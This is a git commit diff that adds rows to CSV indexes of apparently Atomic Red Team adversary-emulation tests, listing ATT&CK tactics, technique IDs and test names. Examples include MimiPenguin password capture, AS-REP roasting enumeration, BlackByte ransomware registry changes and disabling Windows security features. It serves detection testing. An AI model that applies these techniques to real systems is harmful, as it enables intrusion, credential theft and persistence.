Merge branch 'master' into T1562.001-azure-defense-evasion-eventhub-deletion

2022-03-14 14:04:41 -07:00
parent 9dc726b495 6b82fe5136
commit 433d8a29e0
40 changed files with 2448 additions and 43 deletions
@@ -4,6 +4,7 @@ credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Lo
 credential-access,T1003.008,/etc/passwd and /etc/shadow,3,"Access /etc/{shadow,passwd} with a standard bin that's not cat",df1a55ae-019d-4120-bc35-94f4bc5c4b0a,bash
 credential-access,T1003.008,/etc/passwd and /etc/shadow,4,"Access /etc/{shadow,passwd} with shell builtins",f5aa6543-6cb2-4fae-b9c2-b96e14721713,bash
 credential-access,T1558.004,AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
+credential-access,T1558.004,AS-REP Roasting,2,Get-DomainUser with PowerView,d6139549-7b72-4e48-9ea1-324fc9bdf88a,powershell
 credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
 credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
 credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
@@ -102,6 +103,7 @@ credential-access,T1552.004,Private Keys,6,ADFS token signing and encryption cer
 credential-access,T1552.004,Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell
 credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
 credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
+credential-access,T1003.007,Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash
 credential-access,T1606.002,SAML Tokens,1,Golden SAML,b16a03bc-1089-4dcc-ad98-30fe8f3a2b31,powershell
 credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
 credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
@@ -163,6 +165,7 @@ privilege-escalation,T1055.004,Asynchronous Procedure Call,1,Process Injection v
 privilege-escalation,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
 privilege-escalation,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
+privilege-escalation,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
 privilege-escalation,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
 privilege-escalation,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
 privilege-escalation,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
@@ -237,6 +240,7 @@ privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious v
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
+privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
 privilege-escalation,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
 privilege-escalation,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
 privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
@@ -466,6 +470,7 @@ defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar
 defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt
 defense-evasion,T1036,Masquerading,2,Malware Masquerading and Execution from Zip File,4449c89b-ec82-43a4-89c1-91e2f1abeecc,powershell
 defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
+defense-evasion,T1036.005,Match Legitimate Name or Location,2,Masquerade as a built-in system executable,35eb8d16-9820-4423-a2a1-90c4f5edd9ca,powershell
 defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
 defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
 defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
@@ -473,6 +478,15 @@ defense-evasion,T1112,Modify Registry,4,Add domain to Trusted sites Zone,cf44767
 defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
 defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
 defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
+defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
+defense-evasion,T1112,Modify Registry,9,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt
+defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,command_prompt
+defense-evasion,T1112,Modify Registry,11,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt
+defense-evasion,T1112,Modify Registry,12,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt
+defense-evasion,T1112,Modify Registry,13,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt
+defense-evasion,T1112,Modify Registry,14,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt
+defense-evasion,T1112,Modify Registry,15,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt
+defense-evasion,T1112,Modify Registry,16,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
@@ -628,6 +642,7 @@ persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6
 persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
 persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
 persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
+persistence,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
 persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
 persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
 persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
@@ -693,6 +708,7 @@ persistence,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious vbs file r
 persistence,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
 persistence,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
 persistence,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
+persistence,T1547.001,Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
 persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
 persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
 persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
@@ -778,6 +794,8 @@ discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Ob
 discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
 discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
 discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
+discovery,T1087.002,Domain Account,11,Get-DomainUser with PowerView,93662494-5ed7-4454-a04c-8c8372808ac2,powershell
+discovery,T1087.002,Domain Account,12,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
 discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
 discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
 discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
@@ -786,6 +804,11 @@ discovery,T1069.002,Domain Groups,5,Find local admins on all machines in domain
 discovery,T1069.002,Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell
 discovery,T1069.002,Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell
 discovery,T1069.002,Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt
+discovery,T1069.002,Domain Groups,9,Enumerate Active Directory Groups with Get-AdGroup,3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8,powershell
+discovery,T1069.002,Domain Groups,10,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
+discovery,T1069.002,Domain Groups,11,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
+discovery,T1069.002,Domain Groups,12,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
+discovery,T1069.002,Domain Groups,13,Get-DomainGroup with PowerView,5a8a181c-2c8e-478d-a943-549305a01230,powershell
 discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
 discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
 discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
@@ -835,9 +858,14 @@ discovery,T1201,Password Policy Discovery,4,Examine password expiration policy -
 discovery,T1201,Password Policy Discovery,5,Examine local password policy - Windows,4588d243-f24e-4549-b2e3-e627acc089f6,command_prompt
 discovery,T1201,Password Policy Discovery,6,Examine domain password policy - Windows,46c2c362-2679-4ef5-aec9-0e958e135be4,command_prompt
 discovery,T1201,Password Policy Discovery,7,Examine password policy - macOS,4b7fa042-9482-45e1-b348-4b756b2a0742,bash
+discovery,T1201,Password Policy Discovery,8,Get-DomainPolicy with PowerView,3177f4da-3d4b-4592-8bdc-aa23d0b2e843,powershell
+discovery,T1201,Password Policy Discovery,9,Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy,b2698b33-984c-4a1c-93bb-e4ba72a0babb,powershell
 discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
 discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
 discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
+discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell
+discovery,T1057,Process Discovery,4,Process Discovery - get-wmiObject,b51239b4-0129-474f-a2b4-70f855b9f2c2,powershell
+discovery,T1057,Process Discovery,5,Process Discovery - wmic process,640cbf6d-659b-498b-ba53-f6dd1a1cc02c,command_prompt
 discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt
 discovery,T1018,Remote System Discovery,1,Remote System Discovery - net,85321a9c-897f-4a60-9f20-29788e50bccd,command_prompt
 discovery,T1018,Remote System Discovery,2,Remote System Discovery - net group Domain Computers,f1bf6c8f-9016-4edf-aff9-80b65f5d711f,command_prompt
@@ -854,6 +882,10 @@ discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbou
 discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
 discovery,T1018,Remote System Discovery,14,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
 discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell
+discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with Get-AdComputer,97e89d9e-e3f5-41b5-a90f-1e0825df0fdf,powershell
+discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
+discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
+discovery,T1018,Remote System Discovery,19,Get-wmiobject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
 discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
 discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
 discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
@@ -970,6 +1002,7 @@ execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a6
 execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
 execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
 execution,T1059.003,Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt
+execution,T1059.003,Windows Command Shell,4,Simulate BlackByte Ransomware Print Bombing,6b2903ac-8f36-450d-9ad5-b220e8a2dcb9,powershell
 execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
 execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
 execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt
@@ -27,6 +27,7 @@ credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864b
 credential-access,T1552.004,Private Keys,5,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
 credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
 credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
+credential-access,T1003.007,Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash
 credential-access,T1606.002,SAML Tokens,1,Golden SAML,b16a03bc-1089-4dcc-ad98-30fe8f3a2b31,powershell
 collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
 collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
@@ -1,5 +1,6 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
 credential-access,T1558.004,AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
+credential-access,T1558.004,AS-REP Roasting,2,Get-DomainUser with PowerView,d6139549-7b72-4e48-9ea1-324fc9bdf88a,powershell
 credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
 credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
 credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
@@ -107,6 +108,7 @@ privilege-escalation,T1546.011,Application Shimming,3,Registry key creation and/
 privilege-escalation,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
 privilege-escalation,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
+privilege-escalation,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
 privilege-escalation,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
 privilege-escalation,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
 privilege-escalation,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
@@ -159,6 +161,7 @@ privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious v
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
+privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
 privilege-escalation,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
 privilege-escalation,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
 privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
@@ -298,6 +301,7 @@ defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar
 defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
 defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt
 defense-evasion,T1036,Masquerading,2,Malware Masquerading and Execution from Zip File,4449c89b-ec82-43a4-89c1-91e2f1abeecc,powershell
+defense-evasion,T1036.005,Match Legitimate Name or Location,2,Masquerade as a built-in system executable,35eb8d16-9820-4423-a2a1-90c4f5edd9ca,powershell
 defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
 defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
 defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
@@ -305,6 +309,15 @@ defense-evasion,T1112,Modify Registry,4,Add domain to Trusted sites Zone,cf44767
 defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
 defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
 defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
+defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
+defense-evasion,T1112,Modify Registry,9,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt
+defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,command_prompt
+defense-evasion,T1112,Modify Registry,11,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt
+defense-evasion,T1112,Modify Registry,12,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt
+defense-evasion,T1112,Modify Registry,13,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt
+defense-evasion,T1112,Modify Registry,14,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt
+defense-evasion,T1112,Modify Registry,15,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt
+defense-evasion,T1112,Modify Registry,16,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
@@ -425,6 +438,7 @@ persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6
 persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
 persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
 persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
+persistence,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
 persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
 persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
 persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
@@ -464,6 +478,7 @@ persistence,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious vbs file r
 persistence,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
 persistence,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
 persistence,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
+persistence,T1547.001,Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
 persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
 persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
 persistence,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
@@ -522,6 +537,8 @@ discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Ob
 discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
 discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
 discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
+discovery,T1087.002,Domain Account,11,Get-DomainUser with PowerView,93662494-5ed7-4454-a04c-8c8372808ac2,powershell
+discovery,T1087.002,Domain Account,12,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
 discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
 discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
 discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
@@ -530,6 +547,11 @@ discovery,T1069.002,Domain Groups,5,Find local admins on all machines in domain
 discovery,T1069.002,Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell
 discovery,T1069.002,Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell
 discovery,T1069.002,Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt
+discovery,T1069.002,Domain Groups,9,Enumerate Active Directory Groups with Get-AdGroup,3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8,powershell
+discovery,T1069.002,Domain Groups,10,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
+discovery,T1069.002,Domain Groups,11,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
+discovery,T1069.002,Domain Groups,12,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
+discovery,T1069.002,Domain Groups,13,Get-DomainGroup with PowerView,5a8a181c-2c8e-478d-a943-549305a01230,powershell
 discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
 discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
